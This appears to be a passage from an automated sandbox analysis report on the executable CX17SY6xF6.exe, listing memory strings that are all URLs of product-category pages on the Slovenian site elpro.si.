                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-11140-4/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-15883/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-17665/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-461f/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-810g/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-60529/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-61515/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/digita
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/modula
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/nadzor
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/ostalo
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/pisaln
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/prosto
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/zancno
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/
